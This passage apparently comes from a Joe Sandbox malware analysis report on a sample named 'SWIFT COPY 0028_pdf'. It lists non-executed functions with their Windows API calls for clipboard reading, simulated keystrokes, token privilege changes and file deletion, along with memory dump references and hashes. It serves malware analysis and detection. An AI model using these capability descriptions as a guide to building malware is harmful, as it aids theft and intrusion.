                                                                                    • Opcode ID: 01fb72d23ee099dec977b6ea99da1239e8d2de5841acf3fbdab843e4337ebb4e
                                                                                    • Instruction ID: 9e0ad8595f2f1699f0ac90576c9d3125791198d90297d6c095f6dc53084c86ca
                                                                                    • Opcode Fuzzy Hash: 01fb72d23ee099dec977b6ea99da1239e8d2de5841acf3fbdab843e4337ebb4e
                                                                                    • Instruction Fuzzy Hash: DEF0F031940209EBDF21AFB58C06FDF3AA9BF81324F548415F8109B1D1C7788A62DB52
                                                                                    Function 00924252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,009239FE,?,00000001), ref: 00924286
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeLibrary
                                                                                    • String ID:
                                                                                    • API String ID: 3664257935-0
                                                                                    • Opcode ID: 3585d7b8ae36a0fda7504fbe34de76c430eafd840260b56ee75f42705d67b661
                                                                                    • Instruction ID: 269f535012fcb5a9c114145477533ccdba0549f4a78672911ec0136dd6e92b12
                                                                                    • Opcode Fuzzy Hash: 3585d7b8ae36a0fda7504fbe34de76c430eafd840260b56ee75f42705d67b661
                                                                                    • Instruction Fuzzy Hash: 3DF03971509722CFCB349F66E890826BBE8FF043253248A3EF1E686618C7729940DF90
                                                                                    Function 009240A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009240C6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: LongNamePath
                                                                                    • String ID:
                                                                                    • API String ID: 82841172-0
                                                                                    • Opcode ID: 2013d98a87252e6186db95fe2c12035698d61f2b5d79b0f61bbbd86768863180
                                                                                    • Instruction ID: 2c9327d03adf951e04c920731d68bc35e216e0348292420acd44cd158f43e1e2
                                                                                    • Opcode Fuzzy Hash: 2013d98a87252e6186db95fe2c12035698d61f2b5d79b0f61bbbd86768863180
                                                                                    • Instruction Fuzzy Hash: ABE0C236A042245BCB11A658DC46FEA77ADDFCC7A0F0901B5F90AE7248DA64A9819690
                                                                                    Function 01027188 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(000001F4), ref: 01027199
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160878621.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1024000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                    • Instruction ID: aaf9f2c147f03a7de31865cd06508224d3c94b2784757d02513fdf7bda4a0a22
                                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                    • Instruction Fuzzy Hash: E0E0E67494010DDFDB00DFB8D5496DD7BB4EF04301F1041A1FD01D2280D6309D508A72

                                                                                    Non-executed Functions

                                                                                    Function 0098F7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0093B34E: GetWindowLongW.USER32(?,000000EB), ref: 0093B35F
                                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0098F87D
                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0098F8DC
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0098F919
                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0098F940
                                                                                    • SendMessageW.USER32 ref: 0098F966
                                                                                    • _wcsncpy.LIBCMT ref: 0098F9D2
                                                                                    • GetKeyState.USER32(00000011), ref: 0098F9F3
                                                                                    • GetKeyState.USER32(00000009), ref: 0098FA00
                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0098FA16
                                                                                    • GetKeyState.USER32(00000010), ref: 0098FA20
                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0098FA4F
                                                                                    • SendMessageW.USER32 ref: 0098FA72
                                                                                    • SendMessageW.USER32(?,00001030,?,0098E059), ref: 0098FB6F
                                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0098FB85
                                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0098FB96
                                                                                    • SetCapture.USER32(?), ref: 0098FB9F
                                                                                    • ClientToScreen.USER32(?,?), ref: 0098FC03
                                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0098FC0F
                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0098FC29
                                                                                    • ReleaseCapture.USER32 ref: 0098FC34
                                                                                    • GetCursorPos.USER32(?), ref: 0098FC69
                                                                                    • ScreenToClient.USER32(?,?), ref: 0098FC76
                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0098FCD8
                                                                                    • SendMessageW.USER32 ref: 0098FD02
                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0098FD41
                                                                                    • SendMessageW.USER32 ref: 0098FD6C
                                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0098FD84
                                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0098FD8F
                                                                                    • GetCursorPos.USER32(?), ref: 0098FDB0
                                                                                    • ScreenToClient.USER32(?,?), ref: 0098FDBD
                                                                                    • GetParent.USER32(?), ref: 0098FDD9
                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0098FE3F
                                                                                    • SendMessageW.USER32 ref: 0098FE6F
                                                                                    • ClientToScreen.USER32(?,?), ref: 0098FEC5
                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0098FEF1
                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0098FF19
                                                                                    • SendMessageW.USER32 ref: 0098FF3C
                                                                                    • ClientToScreen.USER32(?,?), ref: 0098FF86
                                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0098FFB6
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0099004B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                    • String ID: @GUI_DRAGID$F
                                                                                    • API String ID: 2516578528-4164748364
                                                                                    • Opcode ID: 8589d563d28a1d64f173cdda754321b8dbdbb13e960f148508f7cbd218581775
                                                                                    • Instruction ID: 0169e0b06923b60b859f47a409c100d0ac03045cdbade28fd1c6677527f33ef2
                                                                                    • Opcode Fuzzy Hash: 8589d563d28a1d64f173cdda754321b8dbdbb13e960f148508f7cbd218581775
                                                                                    • Instruction Fuzzy Hash: FD32CA70608344EFDB20EF68C894BAABBA8FF49354F140A29F696873A1C731DC50DB51
                                                                                    Function 0098AACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0098B1CD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: %d/%02d/%02d
                                                                                    • API String ID: 3850602802-328681919
                                                                                    • Opcode ID: 146ce72ddaa97db2a312050a97515f55e92095cf3f13687636b9bb9d7412baf6
                                                                                    • Instruction ID: f3d3611fd1441bb9a238ec064d87c8e2d3dcf5e01bbc04300020f2da8ea0f014
                                                                                    • Opcode Fuzzy Hash: 146ce72ddaa97db2a312050a97515f55e92095cf3f13687636b9bb9d7412baf6
                                                                                    • Instruction Fuzzy Hash: 9112F171604208AFEB24AF64CC49FAE7BB8FF85710F18451AF91ADB2E1DB749901CB51
                                                                                    Function 0093EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32(00000000,00000000), ref: 0093EB4A
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00993AEA
                                                                                    • IsIconic.USER32(000000FF), ref: 00993AF3
                                                                                    • ShowWindow.USER32(000000FF,00000009), ref: 00993B00
                                                                                    • SetForegroundWindow.USER32(000000FF), ref: 00993B0A
                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00993B20
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00993B27
                                                                                    • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00993B33
                                                                                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00993B44
                                                                                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00993B4C
                                                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 00993B54
                                                                                    • SetForegroundWindow.USER32(000000FF), ref: 00993B57
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00993B6C
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00993B77
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00993B81
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00993B86
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00993B8F
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00993B94
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00993B9E
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00993BA3
                                                                                    • SetForegroundWindow.USER32(000000FF), ref: 00993BA6
                                                                                    • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00993BCD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 4125248594-2988720461
                                                                                    • Opcode ID: 9caa6bc041d3d033f7750fbef6bc6259d8bfefdf641db899922e85a58df8a2df
                                                                                    • Instruction ID: e2af61a8ee51a714967319461befc50c91e393e65f1c70e24ec7f4305a87ece6
                                                                                    • Opcode Fuzzy Hash: 9caa6bc041d3d033f7750fbef6bc6259d8bfefdf641db899922e85a58df8a2df
                                                                                    • Instruction Fuzzy Hash: DD3192B1A54218BBEF206F658C49F7F7E6CEF45B50F108025FA06EA1D0D6B19D00AAE0
                                                                                    Function 0095ACC5 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 223COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0095B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0095B180
                                                                                      • Part of subcall function 0095B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0095B1AD
                                                                                      • Part of subcall function 0095B134: GetLastError.KERNEL32 ref: 0095B1BA
                                                                                    • _memset.LIBCMT ref: 0095AD08
                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0095AD5A
                                                                                    • CloseHandle.KERNEL32(?), ref: 0095AD6B
                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0095AD82
                                                                                    • GetProcessWindowStation.USER32 ref: 0095AD9B
                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 0095ADA5
                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0095ADBF
                                                                                      • Part of subcall function 0095AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0095ACC0), ref: 0095AB99
                                                                                      • Part of subcall function 0095AB84: CloseHandle.KERNEL32(?,?,0095ACC0), ref: 0095ABAB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                    • String ID: $default$winsta0
                                                                                    • API String ID: 2063423040-1027155976
                                                                                    • Opcode ID: 94586efca27bd9689d292cb1c81ed88b514f992544050ddf68837bf929ee3dfc
                                                                                    • Instruction ID: 75783bf7aeec55cc34bbbd5c4c2f02b28ad2d7d8f1fc46f8eaabd191b938affe
                                                                                    • Opcode Fuzzy Hash: 94586efca27bd9689d292cb1c81ed88b514f992544050ddf68837bf929ee3dfc
                                                                                    • Instruction Fuzzy Hash: AC819AB1801209AFDF11DFA5DC89AEEBBBCEF08305F044219FD15A61A1D7318E49DB66
                                                                                    Function 009660DD Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 174filestringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00966EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00965FA6,?), ref: 00966ED8
                                                                                      • Part of subcall function 00966EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00965FA6,?), ref: 00966EF1
                                                                                      • Part of subcall function 0096725E: __wsplitpath.LIBCMT ref: 0096727B
                                                                                      • Part of subcall function 0096725E: __wsplitpath.LIBCMT ref: 0096728E
                                                                                      • Part of subcall function 009672CB: GetFileAttributesW.KERNEL32(?,00966019), ref: 009672CC
                                                                                    • _wcscat.LIBCMT ref: 00966149
                                                                                    • _wcscat.LIBCMT ref: 00966167
                                                                                    • __wsplitpath.LIBCMT ref: 0096618E
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 009661A4
                                                                                    • _wcscpy.LIBCMT ref: 00966209
                                                                                    • _wcscat.LIBCMT ref: 0096621C
                                                                                    • _wcscat.LIBCMT ref: 0096622F
                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0096625D
                                                                                    • DeleteFileW.KERNEL32(?), ref: 0096626E
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00966289
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00966298
                                                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 009662AD
                                                                                    • DeleteFileW.KERNEL32(?), ref: 009662BE
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 009662E1
                                                                                    • FindClose.KERNEL32(00000000), ref: 009662FD
                                                                                    • FindClose.KERNEL32(00000000), ref: 0096630B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                    • String ID: \*.*$p1#v`K$v
                                                                                    • API String ID: 1917200108-1732502266
                                                                                    • Opcode ID: 8aa18e8890dc1508362688703f0a2cbed2a1b46c5dfffa8ce4ab90b85dcf7491
                                                                                    • Instruction ID: 8ebfcca05f8fdbf849b135d0827be34c22b60411db18c866ff813ae6abe1d7ae
                                                                                    • Opcode Fuzzy Hash: 8aa18e8890dc1508362688703f0a2cbed2a1b46c5dfffa8ce4ab90b85dcf7491
                                                                                    • Instruction Fuzzy Hash: 3351207280911CAACB21EB91CC54EDFB7BCAF45300F0505E6E595E3141DE36AB89DFA4
                                                                                    Function 00976B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • OpenClipboard.USER32(009BDC00), ref: 00976B36
                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00976B44
                                                                                    • GetClipboardData.USER32(0000000D), ref: 00976B4C
                                                                                    • CloseClipboard.USER32 ref: 00976B58
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00976B74
                                                                                    • CloseClipboard.USER32 ref: 00976B7E
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00976B93
                                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00976BA0
                                                                                    • GetClipboardData.USER32(00000001), ref: 00976BA8
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00976BB5
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00976BE9
                                                                                    • CloseClipboard.USER32 ref: 00976CF6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                    • String ID:
                                                                                    • API String ID: 3222323430-0
                                                                                    • Opcode ID: 4d7d43953726b70646fe406ae31ca324baada8b76cecf81033d99f5adce8d90f
                                                                                    • Instruction ID: 74b20f7ab1c01ee493f09372bef2dcc214a5fc6208b38fd2e23b711d74c3b542
                                                                                    • Opcode Fuzzy Hash: 4d7d43953726b70646fe406ae31ca324baada8b76cecf81033d99f5adce8d90f
                                                                                    • Instruction Fuzzy Hash: 9F51C172249601ABD301EF64DD4AF6E77A8EF85B00F048429F69AD71E1DF70D805DBA2
                                                                                    Function 0096F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0096F62B
                                                                                    • FindClose.KERNEL32(00000000), ref: 0096F67F
                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0096F6A4
                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0096F6BB
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0096F6E2
                                                                                    • __swprintf.LIBCMT ref: 0096F72E
                                                                                    • __swprintf.LIBCMT ref: 0096F767
                                                                                    • __swprintf.LIBCMT ref: 0096F7BB
                                                                                      • Part of subcall function 0094172B: __woutput_l.LIBCMT ref: 00941784
                                                                                    • __swprintf.LIBCMT ref: 0096F809
                                                                                    • __swprintf.LIBCMT ref: 0096F858
                                                                                    • __swprintf.LIBCMT ref: 0096F8A7
                                                                                    • __swprintf.LIBCMT ref: 0096F8F6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                    • API String ID: 835046349-2428617273
                                                                                    • Opcode ID: 8b881a9cfd5964f6af0274d1f40607e2ac77af0a0a1de0f0327f6d84eb1415ed
                                                                                    • Instruction ID: ed0f7e0013ea3d330ee4519bd3a59d34ce2d01397a66b9824ca8209d53860c1e
                                                                                    • Opcode Fuzzy Hash: 8b881a9cfd5964f6af0274d1f40607e2ac77af0a0a1de0f0327f6d84eb1415ed
                                                                                    • Instruction Fuzzy Hash: E3A10DB2408354ABC314EBA4D895EAFB7ECAFD8704F44482EF595C3151EB34DA49CB62
                                                                                    Function 00971B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00971B50
                                                                                    • _wcscmp.LIBCMT ref: 00971B65
                                                                                    • _wcscmp.LIBCMT ref: 00971B7C
                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00971B8E
                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00971BA8
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00971BC0
                                                                                    • FindClose.KERNEL32(00000000), ref: 00971BCB
                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00971BE7
                                                                                    • _wcscmp.LIBCMT ref: 00971C0E
                                                                                    • _wcscmp.LIBCMT ref: 00971C25
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00971C37
                                                                                    • SetCurrentDirectoryW.KERNEL32(009D39FC), ref: 00971C55
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00971C5F
                                                                                    • FindClose.KERNEL32(00000000), ref: 00971C6C
                                                                                    • FindClose.KERNEL32(00000000), ref: 00971C7C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                    • String ID: *.*
                                                                                    • API String ID: 1803514871-438819550
                                                                                    • Opcode ID: edf8dd52c1d376825c20db5546fb4ed28138d86e7d5687e9a6a5717b8aa2fcdc
                                                                                    • Instruction ID: 919ecde287a4f8212de054ef8d167cc890155bbe7efe04fc7e92b66271aad99e
                                                                                    • Opcode Fuzzy Hash: edf8dd52c1d376825c20db5546fb4ed28138d86e7d5687e9a6a5717b8aa2fcdc
                                                                                    • Instruction Fuzzy Hash: C3310832645219ABCF159FF4DC49BDE73AC9F46324F148166F81AE3090EB70DF858AA4
                                                                                    Function 00971C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
